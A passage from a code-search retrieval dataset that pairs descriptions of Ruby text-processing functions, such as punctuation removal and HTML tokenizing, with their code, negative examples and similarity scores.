query (string, 7–9.55k chars) | document (string, 10–363k chars) | metadata (dict) | negatives (sequence, 0–101 items) | negative_scores (sequence, 0–101 items) | document_score (string, 3–10 chars) | document_rank (102 classes) |
---|---|---|---|---|---|---|
remove_punc takes a string containing text, removes all the punctuation from it, and returns a list of words/tokens in the text | def remove_punc(text)
  word_list = []

  # Checking for correct encoding and re-encoding the string if necessary
  unless text.valid_encoding?
    text = text.encode("UTF-16be", :invalid => :replace, :replace => "?").encode('UTF-8')
  end

  # Removing punctuation by splitting on whitespace and punctuation characters
  words = text.split(/[ ,;{}`~!@#$%^&*<>.:"'|?\\()_+=\/\[\]\-]/)

  # Looping through the list, keeping only the leading word characters of each
  # piece and lowercasing it
  for word in words
    word = word[/\w*/]
    word.downcase!
    word_list.push(word)
  end

  # Deleting blanks left behind by consecutive separators
  word_list.delete("")

  return word_list
end | {
  "objective": {
    "self": [],
    "paired": [],
    "triplet": [
      [
        "query",
        "document",
        "negatives"
      ]
    ]
  }
} | [
"def remove_punctuation\n gsub /[[:punct:]]/, ''\n end",
"def remove_punc_and_add_index(word)\n punc_collection = []\n word.chars.each_with_index do |char, index|\n if char.match?(/[',.\\-]/)\n punc_collection << [char, index]\n end\n end\n punc_collection\nend",
"def removeQuotesAndPunc sentence\n\t\tquotes = [\"\\\"\",\"'\",\":\",\",\",\".\",\"(\",\")\",\";\",\"!\",\"&\",\"<\",\">\",\"?\",\"-\",\"_\"]\n\t\twords = sentence.split(' ')\n\t\twords.map! do |w|\n\t\t\tw.slice!(1) if quotes.include?(w[0])\n\t\t\tw.slice(-1) if quotes.include?(w[-1])\n\t\t\tw\n\t\tend\n\t\treturn words.join(' ')\n\tend",
"def strip_punctuation(word)\n punctuation_stripping_regexp = /(.+)([^.,?!-_+=@#$%^&*()])/\n word.match(punctuation_stripping_regexp).to_s\nend",
"def remove_punctuation(phrase)\n phrase.gsub(/[^0-9a-z ,]/i, '')\n end",
"def strip_punctuation(token)\n original_set = token.split('')\n\n array = clean_leading_punctuations(original_set)\n array = clean_trailing_punctuations(array)\n stripped_token = array.join\n\n return token if stripped_token.size <= 2\n\n stripped_token\n end",
"def trim_punctuation\n lambda do |rec, accumulator|\n accumulator.collect! {|s| Marc21.trim_punctuation(s)}\n end\n end",
"def remove_punctuation(str)\n str.gsub(/[^0-9A-Za-z]/, '')\n end",
"def call\n text\n .split\n .map { |token| convert_sym_to_punct(token) }\n .flat_map { |token| \n token = should_downcase(token)\n remove_symbols(token)\n }\n .flat_map { |token| token.split(Regex::COMMAS_OR_PUNCTUATION) }\n .flat_map { |token| token.split(Regex::VARIOUS) }\n .flat_map { |token| token.split(Regex::ENDS_WITH_PUNCTUATION2) }\n .flat_map { |token| split_dotted_email_or_digit(token) }\n .flat_map { |token| split_abbreviations(token) }\n .flat_map { |token| split_period_after_last_word(token) }\n .flat_map { |token| remove_slash_start_and_end(token) }\n end",
"def removePunctuation(line)\n line.to_s.gsub(/(^|\\s+)[[:punct:]]+|[[:punct:]]{2,}|[[:punct:]]+(\\s+|$)/,' ').strip \n end",
"def remove_punctuation(str)\n alpha = 'abcdefghijklmnopqrstuvwxyz '\n output_str = ''\n \n str.each_char do |char|\n if alpha.include?(char)\n output_str += char\n end\n end\n\n output_str\nend",
"def remove_words(text, removes)\n\twords = text.split(\" \")\n\n\twords_to_remove = []\n\n\tremoves.split(\" \").each do |item|\n\t\twords_to_remove << item\n\tend\n\n\treturn_text = \"\"\n\n\twords.each do |word|\n\t\treturn_text += \"#{word} \" unless words_to_remove.include?(word)\n\tend\n\n\treturn return_text\nend",
"def clean_up_punctuation(str)\n str.gsub(%r{[^A-Za-z\\d\\_\\:\\/]}, '')\n end",
"def all_words\n result = []\n tagged_words.each do |word|\n result << word[0] unless is_punctuation([ word[0], word[1] ])\n end\n result\n end",
"def tokenize\n return [] if unencoded_text.blank?\n # kill off all punctuation except [stuff]'s or [stuff]'t\n # this includes hyphens (words are split)\n str = unencoded_text.\n downcase.\n gsub(/[^a-zA-Z0-9\\']+/, ' ').\n gsub(/(\\w)\\'([st])\\b/, '\\1!\\2').gsub(/\\'/, ' ').gsub(/!/, \"'\")\n # Busticate at whitespace\n words = str.strip.split(/\\s+/)\n words.reject!{|w| w.length < 3 }\n words.map!{|w| Wukong::encode_str(w) }\n end",
"def remove_punctuation(string)\n punctuation?(string) ? string.chop! : string\nend",
"def tokenize(s)\nterms = s.gsub(/(\\s|\\d|\\W)+/u,' ').rstrip.strip.downcase.split(' ')\nterms.reject!{|term| @@stop_words.include?(term) || term.length < 3}\nterms\nend",
"def punctuation\n @input = @input.gsub(/\\p{P}/u, '')\n end",
"def normalize_punctuation(str)\n s = str.dup\n s.gsub! /\\s+/, ' '\n\n s.gsub(/\\s*&,/)\n\n # Collapse w/s around all\n s.gsub! /\\s*([:,&.;])\\s*/, '\\1'\n # Collapse consecutive dupes\n s.gsub! /([.,;&:])+/ , '\\1'\n\n # Collapse leading and trailing punctuation\n s.gsub! /^\\s*[,:&;.]|[.;&:,]\\s*$/, ''\n\n # Add whitespaces\n s.gsub! /([,.;:])(\\S)/, '\\1 \\2'\n s.gsub! /(\\S)([&])(\\S)/, '\\1 \\2 \\3'\n\n s.strip!\n s\n end",
"def remove_trailing_punctuation_from_content_at(txt)\n # ImplementationTag #punctuation_characters\n txt.sub(/[;,…]+\\z/, '')\n end",
"def strip_to_stems\n str = self.sanitize_tags\n terms_a = str.gsub(/[^a-z]+/u, ' ').strip.split(' ')\n terms = terms_a.reject do |term|\n ((term.length < 3 && !SHORT_WORDS.include?(term)) || term.length > 20)\n end\n terms.collect! {|term| term.stem}\n terms = terms.select {|term| term.length > 1}\n terms = terms - STOP_STEMS\n return terms.join(' ')\n end",
"def tokenize_string(str)\n str.downcase.split(/\\b+/).map do |word|\n word.gsub(/[^\\w ]/,\"\")\n end.reject{|word| word.size < 2 }\nend",
"def xfrm_remove_stop_words(str)\n stop_words = ['Variant','variant', 'Erhua', 'Counter', 'Has', 'I', 'me', 'a', 'an', 'am', 'are', 'as', 'at', 'be', 'by','how', 'in', 'is', 'it', 'of', 'on', 'or', 'that', 'than', 'the', 'this', 'to', 'was', 'what', 'when', 'where', 'who', 'will', 'with', 'the']\n results = []\n str.gsub!($regexes[:inlined_tags], \"\") ## remove tag blocks\n str.split(' ').each do |sstr|\n # remove non word characters from string\n results << sstr unless stop_words.index(sstr.gsub(/[^a-zA-Z|\\s]/, '').strip)\n end\n return results.flatten.compact.join(' ')\n end",
"def clean_up(string)\n arr = string.split\n final_arr = []\n new_arr = arr.map do |word|\n word.scan(/\\w/).join\n end\n new_arr.each do |word|\n if word != \"\"\n final_arr << word\n end\n end\n final_arr.join(' ')\nend",
"def get_words(str)\n stopwords = stopwords()\n \n str = str.downcase\n str = strip_parenthesis(str)\n str.strip!\n str.gsub!(\"'\", ' ')\n str.gsub!('\"', ' ')\n str.gsub!('.', ' ')\n str.gsub!(',', ' ')\n str.gsub!(':', ' ')\n str.gsub!('/', ' ')\n str.gsub!('!', ' ')\n str.gsub!('?', ' ')\n str.gsub!(';', ' ')\n str.gsub!('<', ' ')\n str.gsub!('>', ' ')\n str.gsub!('-', ' ')\n str.gsub!('$', ' ')\n str.gsub!(/( )+/, ' ')\n str_arr = str.split(' ')\n out_arr = []\n \n for word in str_arr\n if(word.length > 3 and out_arr.index(word) == nil and stopwords.index(word) == nil)\n out_arr << word\n end\n end\n \n out = out_arr.join(' ')\n \n return out\n end",
"def find_tokens(filename)\n html = File.read(filename)\n\n # Parsing the HTML content of the file\n parsed_html = parse_html(html)\n \n # Converting the text into a list of tokens after removing punctuation\n tokens = remove_punc(parsed_html)\n\n return tokens\nend",
"def sanitize_me(string)\n string = string.split(\" \")\n collection = []\n string.each do |word|\n collection << word.gsub(/[^A-Za-z]/,\"\").chars.sort.join\n end\n collection.join(\" \")\nend",
"def normalize( text )\n text.gsub(/\\s/,'').gsub(/[[:punct:]]/, '').gsub(/\\p{S}/,'').downcase\nend",
"def cleanup(str)\n str.gsub(/\\W+/,' ')\nend",
"def words(string)\n return [] if string.nil?\n allowed = [' ', 'a-z', 'A-Z', '0-9'] + String::LATIN_MAP.values\n disallowed = ['¿', '¡'] # Add some disallowed chars that cannot be catched. TODO: Improve!\n match = /[^#{allowed.join('')}]/\n string.\n gsub(/\\s+/mu, ' ').\n gsub(/[#{disallowed.join}]/u, '').\n gsub(/#{match}+ /u, ' ').\n gsub(/ #{match}+/u, ' ').\n gsub(/#{match}+$/u, '').\n gsub(/^#{match}+/u, '').\n split(/ /)\n end",
"def clean_string(string)\n string.gsub(/\\W+/, '')\nend",
"def strip_text(passage)\n passage.downcase.gsub(/[^a-z ]/, ' ').split#split makes and array\nend",
"def words\n @words ||= text.split(/\\s/).delete_if { |word| word.length.zero? }\n end",
"def cleanup(string)\n string.gsub!(/\\W+/, ' ')\nend",
"def cleanup(str)\n str.gsub(/\\W+/, ' ')\nend",
"def sanitize(text)\n sanitized_text = text.dup\n\n # Strip URLs\n sanitized_text.gsub!(URL_REGEX, '')\n\n # Strip @mention style tokens\n sanitized_text.gsub!(MENTION_REGEX, '')\n\n sanitized_text\n end",
"def strip_non_word_characters!\n @raw.gsub!(/[^\\w\\ \\-.,]/, ' ')\n end",
"def normalize(text)\n normalized = text.gsub(\" '\",\" \").gsub(\"' \",\" \")\n normalized.delete! \".\" \",\" \"(\" \")\" \";\" \"!\" \":\" \"?\" \"\\\"\"\n normalized.downcase.split\nend",
"def unique_words(text)\n split_normalise(text).uniq\nend",
"def cleanup(sentence)\n sentence.gsub(/[^a-z]+/i, ' ')\nend",
"def remove_w_words(sentence)\n \nend",
"def cleanup(string)\n string.gsub!(/\\W/, ' ').squeeze(' ')\nend",
"def product_punctuation(str)\nend",
"def pre_tokenize(text)\n normalized_text = text.gsub(/^every\\s\\b/, '')\n normalized_text = text.gsub(/^each\\s\\b/, '')\n normalized_text = text.gsub(/^on the\\s\\b/, '')\n normalized_text.downcase\n end",
"def cleanup(text)\n text.gsub(/[^a-z]/i,\" \").squeeze(\" \")\nend",
"def clean(string)\n string.gsub(/[',.!?:;]['s]/, \"\")\n\nend",
"def cleanup(text)\n text.gsub(/[^a-z]/i, '')\nend",
"def unique_words(text)\n normalize(text).uniq\nend",
"def unique_words(text)\n normalize(text).uniq\nend",
"def cleanup(str)\n str.gsub(/\\W/, ' ').squeeze(' ')\nend",
"def product_punctuation(str)\n\nend",
"def clean(s)\n @cleaned = String.new(s)\n tokenize(@cleaned)\n @cleaned.gsub!(/[.,\\d]*\\d/, '<NUM>')\n @cleaned.gsub!(/[^a-zA-Z0-9,.;:<>\\-'\\/$% ]/, '')\n @cleaned.gsub!('--', ' ')\n @cleaned = @cleaned.split\n end",
"def cleanup(txt)\n txt.gsub(/[^a-z]/i, ' ').squeeze(' ')\nend",
"def remove_chars(str)\n return str.gsub(/,/, \" \").gsub(/[^\\w\\d ]/,\"\").downcase.split\n end",
"def regex_strip(string)\n return string.gsub(/[^\\p{L}\\p{N}]/u, \" \")\n end",
"def tokenize(text)\n text.downcase.split(/[\\s\\.,\"']+/)\n end",
"def remove_non_words_and_downcase str\n # \\W means charcaters not in range [a-zA-z0-9_]\n # dash '-' is removed, but underscore '_' is kept\n # whitespace is not part of \\w so they are removed, too!\n str.downcase\n .gsub(/\\W/, '')\nend",
"def split(text)\n text.downcase.scan(WORDS).uniq\n end",
"def remove_nonprinting_chars(text)\n return text if text.blank?\n\n text.chars.map { |char| rejected_char?(char) ? ' ' : char }.join\n end",
"def wordify(text) # :doc:\n text.split(/\\s+/)\n end",
"def clean_posts(post)\r\n\t\t# takes html-free post and parses it back togther with one space per word.\r\n\t\t# guards against improperly concatenating text together in sister method clean_string\r\n\t\twords = clean_string(post).split()\r\n\t\tpolished = ''\r\n\t\twords.each { |word| polished += word + ' ' }\r\n\t\treturn polished\r\n\tend",
"def clean_text(string)\n if string\n string.chomp!\n string.gsub!(/\\t+|\\(.+?\\)\\s*/,'')\n string.gsub!(/‘|’|„|“/, \"'\")\n string.squeeze!(\"?|!\")\n string.gsub!(/!\\?|\\?!/, \"?\")\n string.gsub!(/…|!|\\.\\.\\./, \".\") # Used the three marks to keep the count clean\n string.gsub!(/(Na)(ja)/i, '\\1 \\2')\n string.squeeze(\" \").strip\n else\n \"\"\n end\n end",
"def remove_w_words(sentence)\r\n\r\n arr = [] # empty array created\r\n x = sentence.split(\" \")\r\n\r\n i = 0\r\n while i < x.length # iteration starts to check \"w\" in each word\r\n arr << x[i] if x[i][0] != \"w\" # words w/o \"w\" collected\r\n i += 1\r\n end\r\n\r\n arr.join(\" \") # result\r\nend",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def pig_it text\n arr = []\n text.split.map do |x|\n split_word = x.split('')\n unless /[[:punct:]]/.match(x)\n first_letter = split_word.first\n split_word.shift\n split_word << \"#{first_letter + 'ay'}\"\n end\n arr << split_word.join\n end\n arr.join(' ')\nend",
"def sanitize text\n [' ', '\\r\\n', \"\\r\\n\", \"\\n\", \"\\r\", \"\\t\", / ^/, / $+/, /^ /, /^ /].each { |text_to_remove|\n text.gsub!(text_to_remove,'')\n }\n return text\n end",
"def cleanup2(string)\n string.gsub(/[^a-z]/i, ' ').squeeze\nend",
"def get_punctuation(string)\n punctuation?(string) ? string.chars.last : ''\nend",
"def clean(s)\n @cleaned = String.new(s)\n tokenize(@cleaned)\n @cleaned.gsub!(/[.,\\d]*\\d/, '<NUM>')\n @cleaned.gsub!(/[^a-zA-Z0-9,.;:<>\\-'\\/$% ]/, '')\n @cleaned.gsub!('--', ' ')\n @cleaned = @cleaned.split\n end",
"def extract_all_words(html)\n doc = Nokogiri::HTML(html)\n keywords = []\n doc.css(\"meta[name='keywords']\").each do |node|\n keywords += node['content'].gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ',]/, '').squeeze(\" \").split(\",\")\n end\n text = String.new\n doc.css(\"meta[name='description']\").each do |node|\n text += node['content']\n end\n \n %w(script style link meta).each do |tag|\n doc.css(tag).each { |node| node.remove }\n end\n\n w = []\n doc.traverse do |node|\n if node.text? then\n w << node.content + \" \"\n end\n end\n text += w.join.gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ']/, '').squeeze(\" \")\n words = (text.downcase.split - STOPWORDS)\n \n final = (keywords + words)\n final.map do |w|\n w.stem\n end\n end",
"def remove_stop_tokens(tokens, stop_words)\n\n # Looping through the list of tokens and removing all the stop words from the list\n for i in tokens\n if stop_words.member?(i)\n tokens.delete(i)\n end\n end\n \n return tokens\nend",
"def scrub_text(text)\n TEXT_GSUBS.inject(text) { |memo, sub| memo = memo.gsub(*sub) }\n end",
"def remove_stop_words(song)\n\ttitle = song\n\ttitle.gsub!(/\\b(a|an|and|by|for|from|in|of|on|out|the|to|with)\\b+/, \"\")\n\treturn title\nend",
"def tokenize(sentence)\n return [] if sentence.nil? || sentence.length == 0\n sentence.split(' ').map { |word| word.downcase.to_sym } # interesting that we symbolize words with punctuation ?!\n end",
"def clean_text\n text.tr(\"'@_\", '').gsub(/\\W/, ' ').gsub(/[0-9]/, '').downcase\n end",
"def make_terms(text, lang)\n if !text\n return []\n end\n \n text = clean_text(text)\n\n # Turn non-breaking spaces into spaces. This is more complex than it should be, \n # due to Ruby version and platform character encoding differences\n # In particular Windows always seems to read as IBM437 encoding\n if RUBY_VERSION < \"1.9\"\n text.gsub!(/\\302\\240/,' ') \n else\n text.gsub!(\"\\u00A0\", \" \") # turn non-breaking spaces (UTF-8) into spaces \n end\n\n text = downcase_l(text,lang)\n\n # cleanups on Cable and Warlogs data\n text.gsub!(\"&\",\"\") # data has some HTML apostrophe mess, clean it up\n text.gsub!(\"amp;\",\"\")\n text.gsub!(\"apos;\",\"'\")\n text.gsub!(\"''\",\"'\") # double '' to single '\n text.gsub!(/<[^>]*>/, '') # strip things inside HTML tags\n\n # allow only a small set of characters\n text.tr!('\"()[]:,',' ') # turn certain punctation into spaces\n text = strippunct_l(text, lang) # remove anything not in the language charset (helps with OCR junk)\n text.gsub!(/\\s\\s*/, ' ') # collapse runs of spaces into single spaces\n\n terms = text.split(' ')\n terms.map!{ |t| t.sub(/^[^a-z0-9]+/,'').sub(/[^a-z0-9]+$/,'') } # remove leading/trailing punctuation\n \n # Now scan through the term list and spit out ungrams, bigrams\n termsout = []\n \n while t = terms.shift\n \n # look for a bigram starting with t\n if terms.length && terms[0] != nil\n t2 = terms[0]\n bigram = t + \"_\" + t2\n if @bigrams.include?(bigram)\n termsout << bigram\n #puts bigram\n next\n end\n end\n \n # DISABLED stemming, for easier installation (stemmer gem not req'd) js 21/2/2012\n # no bigram here, stem the individual term, output if it's \"acceptable\"\n #if @stem_terms \n # t = t.stem\n #end\n \n if term_acceptable(t)\n termsout << t\n end\n \n end\n \n return termsout\n end",
"def regexize_words(words)\n words.each {|word|word.gsub!(/(\\?|\\*)/, '\\w\\1')}\n end",
"def remove_paragraph_tags mytext\n mytext.sub!(/^<p>\\s*<\\/p>/,\"\")\n mytext.sub!(/(<br>)*<p>\\s*<\\/p>$/,\"\")\n mytext.sub!(/^<p>/,'')\n mytext.sub!(/<\\/p>?/,'')\n return mytext\n end",
"def clean_phrase\n clean_phrase = @phrase.dup\n clean_phrase.downcase!\n clean_phrase.squeeze!\n clean_phrase.gsub!(/[[:space:]]/, '')\n clean_phrase = clean_phrase.split(//)\n end",
"def words(text)\n text.downcase.scan(/[a-z]+/)\nend",
"def normalize(text)\n text.downcase.gsub(\"'\",\"\").gsub(/[^a-z ]/, ' ').split\nend",
"def normalize(text)\n text.downcase.split(\"\").map! {|i| i if ('a'..'z').include?(i) || i == \" \"}.join.split(\" \")\nend",
"def mltify_text text\n \n coder = HTMLEntities.new\n text = coder.decode text\n text = sanitize( text, okTags = \"\" )\n text = coder.encode text\n words = text.downcase.gsub( /[^A-za-z0-9\\s'\\-#]/, \" \" ).split( /\\s/ )\n \n final_words = []\n words.each do |w|\n unless stop_words.include? w\n final_words << w\n end\n end\n RAILS_DEFAULT_LOGGER.info final_words.join( ' ' ).squish\n final_words.join( ' ' ).squish\n end",
"def words( strict = false )\n splits = split( /\\b/ )\n splits.reject! { |w| !(w =~ /\\w/) } if strict\n splits\n end",
"def pig(word, howmany = 0)\r\n chars = word.split(//)\r\n lastletter_index = word.rindex(/\\w/)\r\n puncs = {}\r\n \r\n #grab punctuation, store info in hash\r\n chars.each_index { |x| puncs[x] = chars.at(x) if chars.at(x) =~ /\\W/ }\r\n\r\n #delete punctuation so we only deal with letters, does nothing if no punc \r\n chars.delete_if {|x| puncs.values.include?(x)} \r\n\r\n #not the most elegant for dealing with starts-with-vowel words, but more modular this way\r\n #skip this swapping stuff if it's a vowel for first letter\r\n if(howmany > 0) \r\n first = chars.slice!(0, howmany) #grab the first n chars, delete grabbed\r\n\r\n if(first[0] == first[0].upcase) #word was capitalized, swap order\r\n chars[0].upcase!\r\n first[0].downcase!\r\n end\r\n\r\n chars += first\r\n end\r\n\r\n #add back punctuation if it existed, does nothing if no punc\r\n puncs.keys.each { |key| chars.insert(key, puncs[key]) }\r\n \r\n #length == 1 means we got a single vowel like \"I\"; different rule\r\n chars.length == 1 ? chars << \"way\" : chars.insert(lastletter_index + 1, \"ay\") \r\n return chars.join(\"\")\r\nend",
"def test_remove_space_middle_of_id_space\nresult = remove_punctuation(\"sha wn\")\nassert_equal(\"shawn\", result)\nend",
"def process_text(text)\n regexp = /(?:\\s|^|>)(?<word>(\\w{0,3}|[-–—]|\\&ndash\\;|\\&mdash\\;|aboard|about|above|across|after|against|along|amid|among|anti|around|before|behind|below|beneath|beside|besides|between|beyond|concerning|considering|despite|down|during|except|excepting|excluding|following|from|inside|into|like|minus|near|onto|opposite|outside|over|past|plus|regarding|round|save|since|than|that|this|through|toward|towards|under|underneath|unlike|until|upon|versus|with|within|without)(?<space>\\s))/i\n text.gsub(regexp).each { |m| \"#{m[0..-2]} \" }\n end",
"def cleaned(txt)\n\t\ttxt.gsub(/[(,\\'.#)]/, '')\n\tend",
"def cleaned(txt)\n\t\ttxt.gsub(/[(,\\'.#)]/, '')\n\tend",
"def convert_to_words(text)\n convert_to_paragraph(text).join(\" \").split(\" \")\n end",
"def cleanup(str)\r\n str.chars.map {|char| char.match(/[A-Za-z0-9]/) ? char : ' ' }.join.squeeze(\" \")\r\nend",
"def cleanup(string)\n string.gsub(/[\\W\\d]/, ' ').gsub(/\\s+/, ' ')\nend",
"def normalized_words\n self.split(/\\s+/).map { |word|\n Iconv.iconv('ascii//translit//ignore', 'utf-8', word).first.downcase.gsub(/\\W/,'')\n }.\n delete_if(&:empty?).\n map { |word|\n \"**#{word}\"\n }\n end",
"def cleanup(string)\n string.gsub!(/[^a-zA-Z]/, ' ').squeeze(' ')\nend",
"def tokenize(english_text)\n english_text.split(/(<.*?>|<\\/.*?>|\\w+|\\W\\s)/x)\n end",
"def cleanup(str)\n # str.gsub!(/[^a-z]/, ' ').squeeze(' ')\n str.tr_s(' -/:-@[-`{-~', ' ')\nend",
"def clean(text)\n ctext = text.gsub(/[^\\p{Latin}0-9']/, ' ')\n ctext.gsub!(\"'\", \"' \")\n ctext\n end",
"def prep_text_for_match_query(text,exclude_dblquote=false,remove_weak_terms=true)\r\n result = text.dup\r\n result.downcase! # downcase for stop_words removal\r\n result.gsub!(\"'s\",'')\r\n remove_punctuation_proper!(result,exclude_dblquote)\r\n # result.gsub!(/([^\\s]+)/) { |word|\r\n # weak_term?(word) ? '' : word\r\n # } if remove_weak_terms\r\n # result\r\n # #!? check terms as adverbs?\r\n words = result.split(/\\W/)\r\n if remove_weak_terms\r\n words = words.select {|w| !weak_term?(w) }\r\n end\r\n words.compact!\r\n words.join(\" \")\r\n end"
] | [
"0.7275276",
"0.7010769",
"0.70014066",
"0.6991378",
"0.6945574",
"0.6888791",
"0.6863058",
"0.68302804",
"0.6824321",
"0.6711469",
"0.6635981",
"0.6596482",
"0.6585817",
"0.6529046",
"0.6502719",
"0.6480986",
"0.64564526",
"0.6440277",
"0.6398475",
"0.63197947",
"0.63158095",
"0.6250464",
"0.6218636",
"0.61995566",
"0.61629176",
"0.61604595",
"0.61193985",
"0.6071546",
"0.6071275",
"0.6061315",
"0.60362405",
"0.60313034",
"0.59956956",
"0.5980089",
"0.5979548",
"0.59732413",
"0.59661627",
"0.5872317",
"0.5869853",
"0.5864669",
"0.5857193",
"0.5837764",
"0.58330786",
"0.5828338",
"0.5802658",
"0.5782395",
"0.57819635",
"0.57787144",
"0.57787144",
"0.57705104",
"0.5759257",
"0.5721884",
"0.57079905",
"0.5707096",
"0.5695649",
"0.5682064",
"0.56606233",
"0.5656637",
"0.5643177",
"0.56356853",
"0.5634263",
"0.5624374",
"0.5617205",
"0.5612009",
"0.5612009",
"0.5612009",
"0.56016827",
"0.5599197",
"0.5585814",
"0.557979",
"0.55610013",
"0.55602115",
"0.5558068",
"0.54890835",
"0.54829633",
"0.5472611",
"0.5470636",
"0.5465723",
"0.54650587",
"0.5464823",
"0.54390526",
"0.5437744",
"0.5437608",
"0.54371554",
"0.5429608",
"0.5425554",
"0.5416699",
"0.5413396",
"0.541117",
"0.5408368",
"0.5408368",
"0.54080606",
"0.5398531",
"0.53962934",
"0.539415",
"0.5392804",
"0.5372329",
"0.53698516",
"0.5365861",
"0.53561264"
] | 0.7881077 | 0 |
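A minimal usage sketch for the `remove_punc` document above; the sample string and the expected output are illustrative only and assume the definition from this row is in scope:

```ruby
# Illustrative only: exercises remove_punc as defined in the document above.
# Splitting on the punctuation class leaves empty strings between adjacent
# separators, which the final word_list.delete("") removes.
text = "Hello, world! It's a test -- tokens only."
remove_punc(text)
# => ["hello", "world", "it", "s", "a", "test", "tokens", "only"]
```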
function that takes the name of an HTML file stored on disk, and returns a list of tokens (words) in that file. | def find_tokens(filename)
  html = File.read(filename)

  # Parsing the HTML content of the file into plain text
  parsed_html = parse_html(html)

  # Converting the text into a list of tokens after removing punctuation
  tokens = remove_punc(parsed_html)

  return tokens
end | {
  "objective": {
    "self": [],
    "paired": [],
    "triplet": [
      [
        "query",
        "document",
        "negatives"
      ]
    ]
  }
} | [
"def content_tokens\n filename\n end",
"def get_html path\n array = []\n\n archivo = File.open(path, 'r:UTF-8')\n archivo.each do |l|\n array.push(l.strip)\n\tend\n archivo.close\n\n return array\nend",
"def read_tokens()\n\n # By adding @ to tokens, we're saving it also in the instance. We're not\n # going to use that, but it might be useful later.\n @tokens = []\n\n File.open(@filename) do |input_file|\n input_file.each do |line|\n line.split.each do |word|\n word = normalize(word)\n @tokens << word unless word.empty?\n end\n end\n end\n\n @tokens\n end",
"def wordlist(filename)\n wordlist = []\n File.foreach(filename) { |x| wordlist << x.delete!(\"\\r\\n\") }\n wordlist\nend",
"def load_words(file_name)\n words_loaded = []\n File.open(file_name).readlines.each do |line|\n words_loaded << line if line.length.between?(5, 12)\n end\n words_loaded\n end",
"def load_words\n File.read(\"../scrabble word cheat/words.txt\").split(\"\\n\")\nend",
"def LoadFile ()\n\t\n\tinput = \"\"\n\tFile.foreach(\"../Data Files/042-Words.txt\") {|x| input = x }\n\tnames = input.split(\",\")\n\t\n\treturn names;\nend",
"def words_from_file( f )\n result = Array.new\n File.foreach( f ) do | line |\n result << self.words_from_string( line )\n end\n result.flatten\n end",
"def scanner\n @sentences ||= File.open(@path) do |file|\n file.each_line.each_with_object([]) do |line, acc|\n stripped_line = line.strip\n\n unless stripped_line.nil? || stripped_line.empty?\n acc << line.split(' ').map do |word|\n word.split('/').first\n end.join(' ')\n end\n end\n end\n\n end",
"def read_content(file)\n\t\tcontent = []\n\t\tfile.each do |f|\n\t\t\tif File.file?(f)\n\t\t\t\tFile.open(f, \"r\") do |f|\n\t\t\t\t\tword = \"\"\n\t\t\t\t\tf.each_line do |line|\n\t\t\t\t\t\tword += \"#{line}\"\n\t\t\t\t\tend\n\t\t\t\t\tcontent += [word]\n\t\t\t\tend\n\t\t\tend\t\t\t\n\t\tend\n\t\treturn calculate_content(content)\n\tend",
"def initialize(filename)\n @tag_list = nil\n @text_list = nil\n @html_string = []\n #Bring in the html file and return array\n @html_input_array = File.readlines(filename)\n #Iterate through, skip the first element(html declaration)\n @html_input_array[1..-1].each do |input|\n @html_string << input.strip\n end\n #Return array of strings w/o spaces\n @html_string = @html_string.join\n gen_combo_list\n end",
"def generate_token(path)\n tokens = {}\n\n Dir[path + \"*.token\"].each do |file|\n key = File.basename(file, \".token\") #remove path/extension from filename\n #read the first line, remove unwanted char and close it\n tokens[key] = File.open(file, &:readline).gsub(/\\r\\n|\\r|\\n/, '')\n end\n\n tokens\n end",
"def readwordfile name\r\n\t\t \tl_num=0\r\n\t\t File.open(name).each do |l|\r\n\t\t \t@wordtable[l_num] = l.gsub(\"\\r\",\"\").gsub(\"\\n\",\"\")\r\n\t\t l_num +=1\r\n\t\t end\r\n\t\t return l_num\r\n\t\t end",
"def load_old_index\n file = File.open('/home/matt/Documents/programming/ruby/dmsw/index.html', 'rb')\n html = file.read.chomp\n file.close\n return html\nend",
"def wordCollector(pageName)\n\twordHash = Hash.new 0\n\twords = Array.new\n\n\tcurrentPage = Nokogiri::HTML(open(pageName, :allow_redirections => :safe))\n\tpageText = currentPage.css('p').to_s\n\twords = pageText.split(/\\W+|\\d/)\n\twords.each do |string|\n\t wordHash[string] += 1\n\tend\n\treturn Website.new(pageName, wordHash, words.length)\nend",
"def visit_file(name)\n\t\ttrigram = []\n\t\tFile.open(name).each { |line|\n\t\t\ttrigram.push line.chomp\n\t\t\tif trigram.length > 3\n\t\t\t\ttrigram.shift\n\t\t\tend\n\t\t\tif trigram.length == 3\n\t\t\t\tt = Array.new(trigram)\n\t\t\t\t@trigram_counts[t] = 1 + @trigram_counts[t] \n\t\t\tend\n\t\t}\n\tend",
"def parse(filename)\n instructions = open filename\n instructions.read.split(//)\nend",
"def load_words\n File.readlines(\"#{WORD_DIR}/#{language}.txt\").map(&:strip)\n end",
"def extract_badgenames()\n@badgenames_array = []\n file = File.open('app/assets/post.html')\n doc = Nokogiri::HTML(file)\n doc.search('.mb_div > a').map do |element|\n @badgenames_array << element.inner_text\n end\n return @badgenames_array\nend",
"def html_parser(file)\n\n\tpage = Nokogiri::HTML(open(file))\n\n\ttags = page.css(\".started\")\n\ttags.each do |tag| \n\t\t$tweets << {:timestamp => tag.text.strip, :tag => file} \n\tend\n\tp \"Successfully parsed #{file}\"\n\treturn tags\n\nend",
"def readNames(path)\n return File.read(path).rstrip.split(/\\n/).map{|r| r.downcase.split(/\\|/)}\nend",
"def read_html_file(filename)\n \n file = File.open(filename)\n html_code = Nokogiri::HTML(file)\n file.close\n\n return html_code.to_s\nend",
"def support_rdoc_document_file!(file = '.document')\n return [] unless use_document_file\n File.read(file).gsub(/^[ \\t]*#.+/m, '').split(/\\s+/)\n rescue Errno::ENOENT\n []\n end",
"def read_html_file(filename)\n \n file = File.open(filename)\n html_code = Nokogiri::HTML(file)\n file.close\n \n return html_code.to_s\nend",
"def run\n\t\t\t\tif save_file\n\t\t\t\t\tdoc = Nokogiri::HTML(open(@file,\"r\"))\n\t\t\t\t\tparse_page(doc)\n\t\t\t\t\tflush_page\n\t\t\t save_words\n\t\t\t end\n\t\t\tend",
